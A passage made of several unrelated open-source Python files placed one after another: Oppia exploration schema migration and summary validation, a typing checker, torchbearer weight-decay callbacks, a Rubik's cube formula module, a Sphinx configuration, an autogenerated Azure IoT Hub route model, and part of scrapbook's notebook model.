exploration_dict = cls._convert_v9_dict_to_v10_dict(
exploration_dict, title, category)
exploration_schema_version = 10
if exploration_schema_version == 10:
exploration_dict = cls._convert_v10_dict_to_v11_dict(
exploration_dict)
exploration_schema_version = 11
if exploration_schema_version == 11:
exploration_dict = cls._convert_v11_dict_to_v12_dict(
exploration_dict)
exploration_schema_version = 12
if exploration_schema_version == 12:
exploration_dict = cls._convert_v12_dict_to_v13_dict(
exploration_dict)
exploration_schema_version = 13
if exploration_schema_version == 13:
exploration_dict = cls._convert_v13_dict_to_v14_dict(
exploration_dict)
exploration_schema_version = 14
if exploration_schema_version == 14:
exploration_dict = cls._convert_v14_dict_to_v15_dict(
exploration_dict)
exploration_schema_version = 15
if exploration_schema_version == 15:
exploration_dict = cls._convert_v15_dict_to_v16_dict(
exploration_dict)
exploration_schema_version = 16
if exploration_schema_version == 16:
exploration_dict = cls._convert_v16_dict_to_v17_dict(
exploration_dict)
exploration_schema_version = 17
if exploration_schema_version == 17:
exploration_dict = cls._convert_v17_dict_to_v18_dict(
exploration_dict)
exploration_schema_version = 18
if exploration_schema_version == 18:
exploration_dict = cls._convert_v18_dict_to_v19_dict(
exploration_dict)
exploration_schema_version = 19
if exploration_schema_version == 19:
exploration_dict = cls._convert_v19_dict_to_v20_dict(
exploration_dict)
exploration_schema_version = 20
if exploration_schema_version == 20:
exploration_dict = cls._convert_v20_dict_to_v21_dict(
exploration_dict)
exploration_schema_version = 21
if exploration_schema_version == 21:
exploration_dict = cls._convert_v21_dict_to_v22_dict(
exploration_dict)
exploration_schema_version = 22
if exploration_schema_version == 22:
exploration_dict = cls._convert_v22_dict_to_v23_dict(
exploration_dict)
exploration_schema_version = 23
if exploration_schema_version == 23:
exploration_dict = cls._convert_v23_dict_to_v24_dict(
exploration_dict)
exploration_schema_version = 24
if exploration_schema_version == 24:
exploration_dict = cls._convert_v24_dict_to_v25_dict(
exploration_dict)
exploration_schema_version = 25
if exploration_schema_version == 25:
exploration_dict = cls._convert_v25_dict_to_v26_dict(
exploration_dict)
exploration_schema_version = 26
if exploration_schema_version == 26:
exploration_dict = cls._convert_v26_dict_to_v27_dict(
exploration_dict)
exploration_schema_version = 27
if exploration_schema_version == 27:
exploration_dict = cls._convert_v27_dict_to_v28_dict(
exploration_dict)
exploration_schema_version = 28
if exploration_schema_version == 28:
exploration_dict = cls._convert_v28_dict_to_v29_dict(
exploration_dict)
exploration_schema_version = 29
if exploration_schema_version == 29:
exploration_dict = cls._convert_v29_dict_to_v30_dict(
exp_id, exploration_dict)
exploration_schema_version = 30
if exploration_schema_version == 30:
exploration_dict = cls._convert_v30_dict_to_v31_dict(
exploration_dict)
exploration_schema_version = 31
if exploration_schema_version == 31:
exploration_dict = cls._convert_v31_dict_to_v32_dict(
exploration_dict)
exploration_schema_version = 32
if exploration_schema_version == 32:
exploration_dict = cls._convert_v32_dict_to_v33_dict(
exploration_dict)
exploration_schema_version = 33
if exploration_schema_version == 33:
exploration_dict = cls._convert_v33_dict_to_v34_dict(
exploration_dict)
exploration_schema_version = 34
if exploration_schema_version == 34:
exploration_dict = cls._convert_v34_dict_to_v35_dict(
exploration_dict)
exploration_schema_version = 35
if exploration_schema_version == 35:
exploration_dict = cls._convert_v35_dict_to_v36_dict(
exploration_dict)
exploration_schema_version = 36
if exploration_schema_version == 36:
exploration_dict = cls._convert_v36_dict_to_v37_dict(
exploration_dict)
exploration_schema_version = 37
return (exploration_dict, initial_schema_version)
@classmethod
def from_yaml(cls, exploration_id, yaml_content):
"""Creates and returns exploration from a YAML text string for YAML
schema versions 10 and later.
Args:
exploration_id: str. The id of the exploration.
yaml_content: str. The YAML representation of the exploration.
Returns:
Exploration. The corresponding exploration domain object.
Raises:
Exception: The initial schema version of exploration is less than
or equal to 9.
"""
migration_result = cls._migrate_to_latest_yaml_version(
yaml_content, exploration_id)
exploration_dict = migration_result[0]
initial_schema_version = migration_result[1]
if (initial_schema_version <=
cls.LAST_UNTITLED_SCHEMA_VERSION):
raise Exception(
'Expected a YAML version >= 10, received: %d' % (
initial_schema_version))
exploration_dict['id'] = exploration_id
return Exploration.from_dict(exploration_dict)
@classmethod
def from_untitled_yaml(cls, exploration_id, title, category, yaml_content):
"""Creates and returns exploration from a YAML text string. This is
for importing explorations using YAML schema version 9 or earlier.
Args:
exploration_id: str. The id of the exploration.
title: str. The exploration title.
category: str. The exploration category.
yaml_content: str. The YAML representation of the exploration.
Returns:
Exploration. The corresponding exploration domain object.
Raises:
Exception: The initial schema version of exploration is less than
or equal to 9.
"""
migration_result = cls._migrate_to_latest_yaml_version(
yaml_content, exploration_id, title=title, category=category)
exploration_dict = migration_result[0]
initial_schema_version = migration_result[1]
if (initial_schema_version >
cls.LAST_UNTITLED_SCHEMA_VERSION):
raise Exception(
'Expected a YAML version <= 9, received: %d' % (
initial_schema_version))
exploration_dict['id'] = exploration_id
return Exploration.from_dict(exploration_dict)
def to_yaml(self):
"""Convert the exploration domain object into YAML string.
Returns:
str. The YAML representation of this exploration.
"""
exp_dict = self.to_dict()
exp_dict['schema_version'] = self.CURRENT_EXP_SCHEMA_VERSION
# The ID is the only property which should not be stored within the
# YAML representation.
del exp_dict['id']
return python_utils.yaml_from_dict(exp_dict)
def to_dict(self):
"""Returns a copy of the exploration as a dictionary. It includes all
necessary information to represent the exploration.
Returns:
dict. A dict mapping all fields of Exploration instance.
"""
return copy.deepcopy({
'id': self.id,
'title': self.title,
'category': self.category,
'author_notes': self.author_notes,
'blurb': self.blurb,
'states_schema_version': self.states_schema_version,
'init_state_name': self.init_state_name,
'language_code': self.language_code,
'objective': self.objective,
'param_changes': self.param_change_dicts,
'param_specs': self.param_specs_dict,
'tags': self.tags,
'auto_tts_enabled': self.auto_tts_enabled,
'correctness_feedback_enabled': self.correctness_feedback_enabled,
'states': {state_name: state.to_dict()
for (state_name, state) in self.states.items()}
})
def to_player_dict(self):
"""Returns a copy of the exploration suitable for inclusion in the
learner view.
Returns:
dict. A dict mapping some fields of Exploration instance. The
fields inserted in the dict (as key) are:
- init_state_name: str. The name for the initial state of the
exploration.
- param_change. list(dict). List of param_change dicts that
represent ParamChange domain object.
- param_specs: dict. A dict where each key-value pair
represents respectively, a param spec name and a dict used
to initialize a ParamSpec domain object.
- states: dict. Keys are states names and values are dict
representation of State domain object.
- title: str. The exploration title.
- objective: str. The exploration objective.
- language_code: str. The language code of the exploration.
- correctness_feedback_enabled: str. Whether to show correctness
feedback.
"""
return {
'init_state_name': self.init_state_name,
'param_changes': self.param_change_dicts,
'param_specs': self.param_specs_dict,
'states': {
state_name: state.to_dict()
for (state_name, state) in self.states.items()
},
'title': self.title,
'objective': self.objective,
'language_code': self.language_code,
'correctness_feedback_enabled': self.correctness_feedback_enabled,
}
def get_all_html_content_strings(self):
"""Gets all html content strings used in this exploration.
Returns:
list(str). The list of html content strings.
"""
html_list = []
for state in self.states.values():
content_html = state.content.html
interaction_html_list = (
state.interaction.get_all_html_content_strings())
html_list = html_list + [content_html] + interaction_html_list
return html_list
class ExplorationSummary(python_utils.OBJECT):
"""Domain object for an Oppia exploration summary."""
def __init__(
self, exploration_id, title, category, objective,
language_code, tags, ratings, scaled_average_rating, status,
community_owned, owner_ids, editor_ids, voice_artist_ids,
viewer_ids, contributor_ids, contributors_summary, version,
exploration_model_created_on,
exploration_model_last_updated,
first_published_msec):
"""Initializes a ExplorationSummary domain object.
Args:
exploration_id: str. The exploration id.
title: str. The exploration title.
category: str. The exploration category.
objective: str. The exploration objective.
language_code: str. The code that represents the exploration
language.
tags: list(str). List of tags.
ratings: dict. Dict whose keys are '1', '2', '3', '4', '5' and
whose values are nonnegative integers representing frequency
counts. Note that the keys need to be strings in order for this
dict to be JSON-serializable.
scaled_average_rating: float. The average rating.
status: str. The status of the exploration.
community_owned: bool. Whether the exploration is community-owned.
owner_ids: list(str). List of the users ids who are the owners of
this exploration.
editor_ids: list(str). List of the users ids who have access to
edit this exploration.
voice_artist_ids: list(str). List of the users ids who have access
to voiceover this exploration.
viewer_ids: list(str). List of the users ids who have access to
view this exploration.
contributor_ids: list(str). List of the users ids of the user who
have contributed to this exploration.
contributors_summary: dict. A summary about contributors of current
exploration. The keys are user ids and the values are the
number of commits made by that user.
version: int. The version of the exploration.
exploration_model_created_on: datetime.datetime. Date and time when
the exploration model is created.
exploration_model_last_updated: datetime.datetime. Date and time
when the exploration model was last updated.
first_published_msec: int. Time in milliseconds since the Epoch,
when the exploration was first published.
"""
self.id = exploration_id
self.title = title
self.category = category
self.objective = objective
self.language_code = language_code
self.tags = tags
self.ratings = ratings
self.scaled_average_rating = scaled_average_rating
self.status = status
self.community_owned = community_owned
self.owner_ids = owner_ids
self.editor_ids = editor_ids
self.voice_artist_ids = voice_artist_ids
self.viewer_ids = viewer_ids
self.contributor_ids = contributor_ids
self.contributors_summary = contributors_summary
self.version = version
self.exploration_model_created_on = exploration_model_created_on
self.exploration_model_last_updated = exploration_model_last_updated
self.first_published_msec = first_published_msec
def validate(self):
"""Validates various properties of the ExplorationSummary.
Raises:
ValidationError: One or more attributes of the ExplorationSummary
are invalid.
"""
if not isinstance(self.title, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected title to be a string, received %s' % self.title)
utils.require_valid_name(
self.title, 'the exploration title', allow_empty=True)
if not isinstance(self.category, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected category to be a string, received %s'
% self.category)
utils.require_valid_name(
self.category, 'the exploration category', allow_empty=True)
if not isinstance(self.objective, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected objective to be a string, received %s' %
self.objective)
if not isinstance(self.language_code, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected language_code to be a string, received %s' %
self.language_code)
if not utils.is_valid_language_code(self.language_code):
raise utils.ValidationError(
'Invalid language_code: %s' % self.language_code)
if not isinstance(self.tags, list):
raise utils.ValidationError(
'Expected \'tags\' to be a list, received %s' % self.tags)
for tag in self.tags:
if not isinstance(tag, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected each tag in \'tags\' to be a string, received '
'\'%s\'' % tag)
if not tag:
raise utils.ValidationError('Tags should be non-empty.')
if not re.match(constants.TAG_REGEX, tag):
raise utils.ValidationError(
'Tags should only contain lowercase letters and spaces, '
'received \'%s\'' % tag)
if (tag[0] not in string.ascii_lowercase or
tag[-1] not in string.ascii_lowercase):
raise utils.ValidationError(
'Tags should not start or end with whitespace, received '
'\'%s\'' % tag)
if re.search(r'\s\s+', tag):
raise utils.ValidationError(
'Adjacent whitespace in tags should be collapsed, '
'received \'%s\'' % tag)
if len(set(self.tags)) != len(self.tags):
raise utils.ValidationError('Some tags duplicate each other')
if not isinstance(self.ratings, dict):
raise utils.ValidationError(
'Expected ratings to be a dict, received %s' % self.ratings)
valid_rating_keys = ['1', '2', '3', '4', '5']
actual_rating_keys = sorted(self.ratings.keys())
if valid_rating_keys != actual_rating_keys:
raise utils.ValidationError(
'Expected ratings to have keys: %s, received %s' % (
(', ').join(valid_rating_keys),
(', ').join(actual_rating_keys)))
for value in self.ratings.values():
if not isinstance(value, int):
raise utils.ValidationError(
'Expected value to be int, received %s' % value)
if value < 0:
raise utils.ValidationError(
'Expected value to be non-negative, received %s' % (
value))
if not isinstance(self.scaled_average_rating, float):
raise utils.ValidationError(
'Expected scaled_average_rating to be float, received %s' % (
self.scaled_average_rating))
if not isinstance(self.status, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected status to be string, received %s' % self.status)
if not isinstance(self.community_owned, bool):
raise utils.ValidationError(
'Expected community_owned to be bool, received %s' % (
self.community_owned))
if not isinstance(self.owner_ids, list):
raise utils.ValidationError(
'Expected owner_ids to be list, received %s' % self.owner_ids)
for owner_id in self.owner_ids:
if not isinstance(owner_id, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected each id in owner_ids to '
'be string, received %s' % owner_id)
if not isinstance(self.editor_ids, list):
raise utils.ValidationError(
'Expected editor_ids to be list, received %s' % self.editor_ids)
for editor_id in self.editor_ids:
if not isinstance(editor_id, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected each id in editor_ids to '
'be string, received %s' % editor_id)
if not isinstance(self.voice_artist_ids, list):
raise utils.ValidationError(
'Expected voice_artist_ids to be list, received %s' % (
self.voice_artist_ids))
for voice_artist_id in self.voice_artist_ids:
if not isinstance(voice_artist_id, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected each id in voice_artist_ids to '
'be string, received %s' % voice_artist_id)
if not isinstance(self.viewer_ids, list):
raise utils.ValidationError(
'Expected viewer_ids to be list, received %s' % self.viewer_ids)
for viewer_id in self.viewer_ids:
if not isinstance(viewer_id, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected each id in viewer_ids to '
'be string, received %s' % viewer_id)
if not isinstance(self.contributor_ids, list):
raise utils.ValidationError(
'Expected contributor_ids to be list, received %s' % (
self.contributor_ids))
for contributor_id in self.contributor_ids:
if not isinstance(contributor_id, python_utils.BASESTRING):
raise utils.ValidationError(
'Expected each id in contributor_ids to '
'be string, received %s' % contributor_id)
if not isinstance(self.contributors_summary, dict):
raise utils.ValidationError(
'Expected contributors_summary to be dict, received %s' % (
self.contributors_summary))
def to_metadata_dict(self):
"""Given an exploration summary, this method returns a dict containing
id, title and objective of the exploration.
Returns:
A metadata dict for the given exploration summary.
The metadata dict has three keys:
- 'id': str. The exploration ID.
- 'title': str. The exploration title.
- 'objective': str. The exploration objective.
"""
return {
'id': self.id,
'title': self.title,
'objective': self.objective,
}
def is_private(self):
"""Checks whether the exploration is private.
Returns:
bool. Whether the exploration is private.
"""
return self.status == constants.ACTIVITY_STATUS_PRIVATE
def is_solely_owned_by_user(self, user_id):
"""Checks whether the exploration is solely owned by the user.
Args:
user_id: str. The id of the user.
Returns:
bool. Whether the exploration is solely owned by the user.
"""
return user_id in self.owner_ids and len(self.owner_ids) == 1
|
import inspect
import typing
from abc import ABC
import builtins
def get_builtins():
return list(filter(lambda x: not x.startswith('_'), dir(builtins)))
class ITypeChecker(ABC):
def is_class(self, obj):
if inspect.isclass(obj) and not self.is_primitive(obj):
return True
return False
def is_primitive(self, obj):
builtins_list = list(filter(lambda x: not x.startswith('_'), dir(builtins)))
return obj.__name__ in builtins_list
def is_generic(self, class_type):
pass
def is_base_generic(self, class_type):
pass
# python 3.7
if hasattr(typing, '_GenericAlias'):
class TypeChecker(ITypeChecker):
def is_generic(self, class_type):
return self._is_generic(class_type)
def is_base_generic(self, class_type):
return self._is_base_generic(class_type)
def _is_generic(self, cls):
if isinstance(cls, typing._GenericAlias):
return True
if isinstance(cls, typing._SpecialForm):
return cls not in {typing.Any}
return False
def _is_base_generic(self, cls):
if isinstance(cls, typing._GenericAlias):
if cls.__origin__ in {typing.Generic, typing._Protocol}:
return False
if isinstance(cls, typing._VariadicGenericAlias):
return True
return len(cls.__parameters__) > 0
if isinstance(cls, typing._SpecialForm):
return cls._name in {'ClassVar', 'Union', 'Optional'}
return False
elif hasattr(typing, '_Union'):
class TypeChecker(ITypeChecker):
# python 3.6
def is_generic(self, class_type):
return self._is_generic(class_type)
def is_base_generic(self, class_type):
return self._is_base_generic(class_type)
def _is_generic(self, cls):
if isinstance(cls, (typing.GenericMeta, typing._Union, typing._Optional, typing._ClassVar)):
return True
return False
def _is_base_generic(self, cls):
if isinstance(cls, (typing.GenericMeta, typing._Union)):
return cls.__args__ in {None, ()}
if isinstance(cls, typing._Optional):
return True
return False
|
import torchbearer
from torchbearer.callbacks import Callback
import torch
class WeightDecay(Callback):
"""Create a WeightDecay callback which uses the given norm on the given parameters and with the given decay rate.
If params is None (default) then the parameters will be retrieved from the model.
Example: ::
>>> from torchbearer import Trial
>>> from torchbearer.callbacks import WeightDecay
# Example Trial which runs a trial with weight decay on the model
>>> decay = WeightDecay()
>>> trial = Trial(None, callbacks=[decay], metrics=['loss'], verbose=2).for_steps(10).run(1)
Args:
rate (float): The decay rate or lambda
p (int): The norm level
params (Iterable[Tensor] or Tensor, optional): an iterable of Tensors or a
single Tensor that will have gradients normalized, otherwise this is retrieved from state
State Requirements:
- :attr:`torchbearer.state.MODEL`: Model should have the `parameters` method
- :attr:`torchbearer.state.LOSS`: Loss should be a tensor that can be incremented
"""
def __init__(self, rate=5e-4, p=2, params=None):
super(WeightDecay, self).__init__()
self.p = p
self.params = params
self.rate = rate
def on_start(self, state):
"""Retrieve params from state['model'] if required.
Args:
state (dict): The :class:`.Trial` state
"""
if self.params is None:
self.params = state[torchbearer.MODEL].parameters()
def on_criterion(self, state):
"""Calculate the decay term and add to state['loss'].
Args:
state (dict): The :class:`.Trial` state
"""
for param in self.params:
state[torchbearer.LOSS] += self.rate * torch.norm(param, self.p)
class L1WeightDecay(WeightDecay):
"""WeightDecay callback which uses an L1 norm with the given rate and parameters. If params is None (default) then
the parameters will be retrieved from the model.
Example: ::
>>> from torchbearer import Trial
>>> from torchbearer.callbacks import L1WeightDecay
# Example Trial which runs a trial with weight decay on the model using an L1 norm
>>> decay = L1WeightDecay()
>>> trial = Trial(None, callbacks=[decay], metrics=['loss'], verbose=2).for_steps(10).run(1)
Args:
rate (float): The decay rate or lambda
params (Iterable[Tensor] or Tensor, optional): an iterable of Tensors or a
single Tensor that will have gradients normalized, otherwise this is retrieved from state
State Requirements:
- :attr:`torchbearer.state.MODEL`: Model should have the `parameters` method
- :attr:`torchbearer.state.LOSS`: Loss should be a tensor that can be incremented
"""
def __init__(self, rate=5e-4, params=None):
super(L1WeightDecay, self).__init__(rate=rate, p=1, params=params)
class L2WeightDecay(WeightDecay):
"""WeightDecay callback which uses an L2 norm with the given rate and parameters. If params is None (default) then
the parameters will be retrieved from the model.
Example: ::
>>> from torchbearer import Trial
>>> from torchbearer.callbacks import L2WeightDecay
# Example Trial which runs a trial with weight decay on the model using an L2 norm
>>> decay = L2WeightDecay()
>>> trial = Trial(None, callbacks=[decay], metrics=['loss'], verbose=2).for_steps(10).run(1)
Args:
rate (float): The decay rate or lambda
params (Iterable[Tensor] or Tensor, optional): an iterable of Tensors or a
single Tensor that will have gradients normalized, otherwise this is retrieved from state
State Requirements:
- :attr:`torchbearer.state.MODEL`: Model should have the `parameters` method
- :attr:`torchbearer.state.LOSS`: Loss should be a tensor that can be incremented
"""
def __init__(self, rate=5e-4, params=None):
super(L2WeightDecay, self).__init__(rate=rate, p=2, params=params)
|
"""
This module implements the Rubik's Cube formulae.
You can deal with Rubik's Cube formulae easily with Step and Formula.
Usage:
>>> a = Formula("R U R' U'")
>>> a
R U R' U'
>>> a.reverse()
>>> a
U R U' R'
>>> a.mirror()
>>> a
U' L' U L
>>> a *= 3
>>> a
U' L' U L U' L' U L U' L' U L
"""
from .move import GenericCubicMove, Move
from .formula import BaseFormula
class GenericCubicFormula(BaseFormula):
_move = GenericCubicMove
class Formula(GenericCubicFormula):
_move = Move
__all__ = ["GenericCubicMove", "Move", "GenericCubicFormula", "Formula"]
|
# -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
from pkg_resources import get_distribution
# -- Project information -----------------------------------------------------
project = 'muse-psfr'
copyright = '2019, Simon Conseil, Thierry Fusco'
author = 'Simon Conseil, Thierry Fusco'
release = get_distribution('muse_psfr').version
version = '.'.join(release.split('.')[:2])
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.autosummary',
'sphinx.ext.doctest',
'sphinx.ext.intersphinx',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode',
'sphinx.ext.napoleon',
'sphinxcontrib.programoutput',
'matplotlib.sphinxext.plot_directive',
]
plot_include_source = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The reST default role (used for this markup: `text`) to use for all documents
default_role = 'obj'
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output -------------------------------------------------
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd: # only import and set the theme if we're building docs locally
import sphinx_rtd_theme
html_theme = "sphinx_rtd_theme"
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
# html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Extension configuration -------------------------------------------------
# -- Options for intersphinx extension ---------------------------------------
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
'python': ('https://docs.python.org/3/', None),
# 'numpy': ('https://docs.scipy.org/doc/numpy/', None),
# 'scipy': ('https://docs.scipy.org/doc/scipy/reference/', None),
# 'matplotlib': ('https://matplotlib.org/', None),
'astropy': ('http://docs.astropy.org/en/stable/', None),
}
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class FallbackRouteProperties(Model):
"""The properties of the fallback route. IoT Hub uses these properties when it
routes messages to the fallback endpoint.
Variables are only populated by the server, and will be ignored when
sending a request.
All required parameters must be populated in order to send to Azure.
:param name: The name of the route. The name can only include alphanumeric
characters, periods, underscores, hyphens, has a maximum length of 64
characters, and must be unique.
:type name: str
:ivar source: Required. The source to which the routing rule is to be
applied to. For example, DeviceMessages. Default value: "DeviceMessages" .
:vartype source: str
:param condition: The condition which is evaluated in order to apply the
fallback route. If the condition is not provided it will evaluate to true
by default. For grammar, See:
https://docs.microsoft.com/azure/iot-hub/iot-hub-devguide-query-language
:type condition: str
:param endpoint_names: Required. The list of endpoints to which the
messages that satisfy the condition are routed to. Currently only 1
endpoint is allowed.
:type endpoint_names: list[str]
:param is_enabled: Required. Used to specify whether the fallback route is
enabled.
:type is_enabled: bool
"""
_validation = {
'source': {'required': True, 'constant': True},
'endpoint_names': {'required': True, 'max_items': 1, 'min_items': 1},
'is_enabled': {'required': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'source': {'key': 'source', 'type': 'str'},
'condition': {'key': 'condition', 'type': 'str'},
'endpoint_names': {'key': 'endpointNames', 'type': '[str]'},
'is_enabled': {'key': 'isEnabled', 'type': 'bool'},
}
source = "DeviceMessages"
def __init__(self, *, endpoint_names, is_enabled: bool, name: str=None, condition: str=None, **kwargs) -> None:
super(FallbackRouteProperties, self).__init__(**kwargs)
self.name = name
self.condition = condition
self.endpoint_names = endpoint_names
self.is_enabled = is_enabled
|
# -*- coding: utf-8 -*-
"""
models.py
Provides the various model wrapper objects for scrapbook
"""
from __future__ import unicode_literals
import os
import copy
import nbformat
import collections
import pandas as pd
from six import string_types
from collections import OrderedDict
from IPython.display import display as ip_display, Markdown
# We lean on papermill's readers to connect to remote stores
from papermill.iorw import papermill_io
from .scraps import Scrap, Scraps, payload_to_scrap, scrap_to_payload
from .schemas import GLUE_PAYLOAD_PREFIX, RECORD_PAYLOAD_PREFIX
from .encoders import registry as encoder_registry
from .exceptions import ScrapbookException
from .utils import kernel_required, deprecated
try:
from urllib.parse import urlparse # Py3
except ImportError:
from urlparse import urlparse # Py2
def merge_dicts(dicts):
iterdicts = iter(dicts)
outcome = next(iterdicts).copy()
for d in iterdicts:
outcome.update(d)
return outcome
class Notebook(object):
"""
Representation of a notebook. This model is quasi-compatible with the
nbformat NotebookNode object in that it support access to the v4
required fields from nbformat's json schema. For complete access to
normal nbformat operations, use the `node` attribute of this model.
Parameters
----------
node_or_path : `nbformat.NotebookNode`, str
a notebook object, or a path to a notebook object
"""
def __init__(self, node_or_path):
if isinstance(node_or_path, string_types):
path = urlparse(node_or_path).path
if not os.path.splitext(path)[-1].endswith('ipynb'):
raise Warning(
"Requires an '.ipynb' file extension. Provided path: '{}'".format(
node_or_path
)
)
self.path = node_or_path
self.node = nbformat.reads(papermill_io.read(node_or_path), as_version=4)
else:
self.path = ""
self.node = node_or_path
# Memoized traits
self._scraps = None
self._outputs = None
def copy(self):
cp = Notebook(self.node.copy())
cp.path = self.path
return cp
# nbformat mirroring properties
@property
def metadata(self):
return self.node.metadata
@property
def nbformat_minor(self):
return self.node.nbformat_minor
@property
def nbformat(self):
return self.node.nbformat
@property
def cells(self):
return self.node.cells
@property
def filename(self):
"""str: filename found a the specified path"""
return os.path.basename(self.path)
@property
def directory(self):
"""str: directory name found for a notebook (nb)"""
return os.path.dirname(self.path)
@property
def parameters(self):
"""dict: parameters stored in the notebook metadata"""
return self.metadata.get("papermill", {}).get("parameters", {})
def _extract_papermill_output_data(self, sig, payload):
if sig.startswith(RECORD_PAYLOAD_PREFIX):
# Fetch '+json' and strip the leading '+'
encoder = sig.split(RECORD_PAYLOAD_PREFIX, 1)[1][1:]
# First key is the only named payload
for name, data in payload.items():
return encoder_registry.decode(Scrap(name, data, encoder))
def _extract_output_data_scraps(self, output):
output_scraps = Scraps()
for sig, payload in output.get("data", {}).items():
# Backwards compatibility for papermill
scrap = self._extract_papermill_output_data(sig, payload)
if scrap is None and sig.startswith(GLUE_PAYLOAD_PREFIX):
scrap = encoder_registry.decode(payload_to_scrap(payload))
if scrap:
output_scraps[scrap.name] = scrap
return output_scraps
def _extract_output_displays(self, output):
output_displays = OrderedDict()
# Backwards compatibility for papermill
metadata = output.get("metadata", {})
if "papermill" in metadata:
output_name = output.metadata["papermill"].get("name")
if output_name:
output_displays[output_name] = output
# Only grab outputs that are displays
elif metadata.get("scrapbook", {}).get("display"):
output_name = output.metadata["scrapbook"].get("name")
if output_name:
output_displays[output_name] = output
return output_displays
def _fetch_scraps(self):
"""Returns a dictionary of the data recorded in a notebook."""
scraps = Scraps()
for cell in self.cells:
for output in cell.get("outputs", []):
output_data_scraps = self._extract_output_data_scraps(output)
output_displays = self._extract_output_displays(output)
# Combine displays with data while trying to preserve ordering
output_scraps = Scraps(
[
# Hydrate with output_displays
(
scrap.name,
Scrap(
scrap.name,
scrap.data,
scrap.encoder,
output_displays.get(scrap.name),
),
)
for scrap in output_data_scraps.values()
]
)
for name, display in output_displays.items():
if name not in output_scraps:
output_scraps[name] = Scrap(name, None, "display", display)
scraps.update(output_scraps)
return scraps
@property
def scraps(self):
"""dict: a dictionary of data found in the notebook"""
if self._scraps is None:
self._scraps = self._fetch_scraps()
return self._scraps
@property
def cell_timing(self):
"""list: a list of cell execution timings in cell order"""
return [
# TODO: Other timing conventions?
cell.metadata.get("papermill", {}).get("duration", 0.0)
if cell.get("execution_count")
else None
for cell in self.cells
]
@property
def execution_counts(self):
"""list: a list of cell execution counts in cell order"""
return [cell.get("execution_count") for cell in self.cells]
@property
@deprecated('0.4.0', '`metrics`')
def papermill_metrics(self):
return self.metrics
@property
def metrics(self):
"""pandas dataframe: dataframe of cell execution counts and times"""
df = pd.DataFrame(columns=["filename", "cell", "value", "type"])
for i, cell in enumerate(self.cells):
execution_count = cell.get("execution_count")
if not execution_count:
continue
name = "Out [{}]".format(str(execution_count))
value = cell.metadata.get("papermill", {}).get("duration", 0.0)
df.loc[i] = self.filename, name, value, "time (s)"
return df
@property
def parameter_dataframe(self):
"""pandas dataframe: dataframe of notebook parameters"""
# Meant for backwards compatibility to papermill's dataframe method
return pd.DataFrame(
[
[name, self.parameters[name], "parameter", self.filename]
for name in sorted(self.parameters.keys())
],
columns=["name", "value", "type", "filename"],
)
@property
def scrap_dataframe(self):
"""pandas dataframe: dataframe of cell scraps"""
df = self.scraps.dataframe
df["filename"] = self.filename
return df
@property
@deprecated('1.0.0')
def papermill_record_dataframe(self):
"""pandas dataframe: dataframe of cell scraps"""
# Meant for backwards compatibility to papermill's dataframe method
return pd.DataFrame(
[
[name, self.scraps[name].data, "record", self.filename]
for name in sorted(self.scraps.keys())
if self.scraps[name].data is not None
],
columns=["name", "value", "type", "filename"],
)
@property
@deprecated('1.0.0')
def papermill_dataframe(self):
"""pandas dataframe: dataframe of notebook parameters and cell scraps"""
# Meant for backwards compatibility to papermill's dataframe method
return self.parameter_dataframe.append(
self.papermill_record_dataframe, ignore_index=True
)
def _strip_scrapbook_metadata(self, metadata):
copied = copy.copy(metadata)
